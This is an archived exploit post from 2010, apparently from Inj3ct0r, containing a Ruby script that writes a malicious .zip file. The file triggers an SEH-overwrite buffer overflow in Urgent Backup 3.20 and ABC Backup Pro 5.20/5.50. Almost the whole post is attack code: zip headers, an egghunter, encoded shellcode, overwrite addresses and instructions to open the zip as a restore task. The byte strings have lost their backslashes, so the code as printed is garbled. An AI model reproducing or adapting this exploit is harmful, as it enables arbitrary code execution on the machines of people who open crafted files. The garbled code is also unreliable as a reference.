Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50 (
Posted on 30 April 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50 (.zip) SEH</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================================== Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50 (.zip) SEH ===================================================================== #!/usr/bin/ruby # Software : Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50 # Author : Lincoln # Date : April 27, 2010 # Reference : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-034 # OS : Windows # Tested on : XP SP3 En (VirtualBox) # Type of vuln : SEH # Greetz to : Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # Corelan does not want anyone to use this script # for malicious and/or illegal purposes. # Corelan cannot be held responsible for any illegal use. # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # # banner = "|------------------------------------------------------------------| " + "| __ __ | " + "| _________ ________ / /___ _____ / /____ ____ _____ ___ | " + "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ | " + "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / | " + "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ | " + "| | " + "| http://www.corelan.be:8800 | " + "| | " + "|-------------------------------------------------[ EIP Hunters ]--| " unless ARGV.length == 1 print banner puts "[+] Exploit for Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50" puts "[+] Usage: select form the following:" puts "[+] 1). Urgent Backup 3.20 & ABC Backup Pro 5.20" puts "[+] 2). ABC Backup 5.50" puts "[+] ex: ./urgent.rb 1 " exit end var = ARGV[0].to_i #Zip Headers header1= "x50x4bx03x04x14x00x00x00" + "x00x00xb7xacxcex34x00x00" + "x00x00x00x00x00x00x00x00" + "x00xc4x09x00x00x00" header2= "x50x4bx01x02x14x00x14x00" + "x00x00x00x00xb7xacxcex34" + "x00x00x00x00x00x00x00x00" + "x00x00x00x00xc4x09x00x00" + "x00x00x00x00x01x00x24x00" + "x00x00x00x00x00x00" header3= "x50x4bx05x06x00x00x00x00" + "x01x00x01x00xf2x09x00x00" + "xe2x09x00x00x00x00" #sub dx, 3000 egg = "x66x81xeaxb8x0bx42x52x6a" + "x02x58xcdx2ex3cx05x5ax74" + "xefxb8x77x30x30x74x8bxfa" + "xafx75xeaxafx75xe7xffxe7" #msgbox: "Exploited by Corelan Security Team" shellcode = "w00tw00t" + "x89xe3xdaxd7xd9x73xf4x59x49x49x49x49x49x49" + "x49x49x49x49x49x43x43x43x43x43x43x37x51x5a" + "x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" + "x42x32x42x42x30x42x42x41x42x58x50x38x41x42" + "x75x4ax49x4ax79x4ax4bx4dx4bx4bx69x51x64x45" + "x74x4ax54x45x61x4ex32x4ex52x42x5ax46x51x49" + "x59x42x44x4ex6bx51x61x44x70x4cx4bx43x46x44" + "x4cx4ex6bx42x56x47x6cx4cx4bx51x56x44x48x4c" + "x4bx51x6ex45x70x4ex6bx45x66x50x38x50x4fx47" + "x68x50x75x4cx33x50x59x45x51x4bx61x4bx4fx48" + "x61x51x70x4cx4bx50x6cx46x44x45x74x4cx4bx51" + "x55x47x4cx4cx4bx50x54x43x35x50x78x43x31x4b" + "x5ax4cx4bx42x6ax47x68x4ex6bx43x6ax47x50x45" + "x51x4ax4bx48x63x46x57x50x49x4ex6bx44x74x4c" + "x4bx45x51x4ax4ex44x71x49x6fx50x31x4bx70x4b" + "x4cx4ex4cx4fx74x4bx70x43x44x46x6ax4ax61x4a" + "x6fx44x4dx47x71x4bx77x48x69x4ax51x4bx4fx49" + "x6fx49x6fx45x6bx43x4cx45x74x51x38x51x65x49" + "x4ex4ex6bx42x7ax45x74x45x51x4ax4bx43x56x4e" + "x6bx46x6cx42x6bx4cx4bx43x6ax45x4cx43x31x4a" + "x4bx4ex6bx45x54x4ex6bx47x71x4dx38x4fx79x51" + "x54x46x44x47x6cx45x31x4ax63x4fx42x44x48x46" + "x49x48x54x4fx79x4bx55x4dx59x49x52x50x68x4c" + "x4ex50x4ex44x4ex48x6cx50x52x4bx58x4dx4cx4b" + "x4fx49x6fx4bx4fx4fx79x51x55x46x64x4dx6bx51" + "x6ex49x48x4dx32x51x63x4cx47x45x4cx44x64x51" + "x42x4dx38x4ex6bx49x6fx49x6fx4bx4fx4cx49x42" + "x65x47x78x43x58x42x4cx50x6cx45x70x4bx4fx51" + "x78x47x43x45x62x46x4ex45x34x45x38x51x65x51" + "x63x45x35x44x32x4dx58x51x4cx44x64x44x4ax4c" + "x49x48x66x43x66x4bx4fx43x65x46x64x4cx49x4b" + "x72x50x50x4dx6bx4ex48x4cx62x50x4dx4dx6cx4e" + "x67x47x6cx47x54x46x32x4bx58x43x6ex49x6fx49" + "x6fx49x6fx42x48x51x74x45x71x51x48x45x70x43" + "x58x44x30x43x47x42x4ex42x45x44x71x4bx6bx4b" + "x38x43x6cx45x74x46x66x4bx39x48x63x45x38x50" + "x61x42x4dx50x58x45x70x51x78x42x59x45x70x50" + "x54x51x75x51x78x44x35x43x42x50x69x51x64x43" + "x58x51x30x43x63x45x35x43x53x51x78x42x45x42" + "x4cx50x61x50x6ex42x48x51x30x51x53x50x6fx50" + "x72x45x38x43x54x51x30x50x62x43x49x51x78x42" + "x4fx43x59x42x54x50x65x51x78x42x65x51x68x42" + "x50x50x6cx46x51x48x49x4ex68x50x4cx46x44x45" + "x72x4dx59x49x71x44x71x4ax72x43x62x43x63x50" + "x51x46x32x4bx4fx48x50x50x31x4fx30x46x30x4b" + "x4fx51x45x44x48x45x5ax41x41" size = 2496 junk = "x90" * (276 - egg.length) nseh = "x5cx61x98xa0" #pop esp / pop ad / jmp ecx seh = "x16x66x40x00" #universal p/p retn 8 altseh = "x7Ex6Bx6Bx00" #universal p/p retn 8 for ABC 5.50 regular pay1 = junk + egg + nseh + seh + shellcode pay2 = junk + egg + nseh + altseh + shellcode rest = "D" * (size - pay1.length) opt1 = pay1 + rest + ".txt" opt2 = pay2 + rest + ".txt" if var == 1 if File.exist?("Urgent2.zip") then File.delete("Urgent2.zip") end filename = "Urgent1.zip" f = File.new(filename, 'w') f.write header1 + opt1 + header2 + opt1 + header3 f.close print banner puts "[+] Exploit for Option 1: Urgent Backup 3.20 & ABC Backup Pro 5.20" puts "[+] file size : #{opt1.length}" puts "[+] Wrote exploit file : #{filename}" puts "[+] Run zip as restore task and boom! " exit elsif var == 2 if File.exist?("Urgent1.zip") then File.delete("Urgent1.zip") end filename = "Urgent2.zip" f = File.new(filename, 'w') f.write header1 + opt2 + header2 + opt2 + header3 f.close print banner puts "[+] Exploit for Option 2: ABC Backup 5.50" puts "[+] file size : #{opt2.length}" puts "[+] Wrote exploit file : #{filename}" puts "[+] Run zip as restore task and boom! " exit else puts "DOH!, read the instructions: ./urgent.rb" end # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-30]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
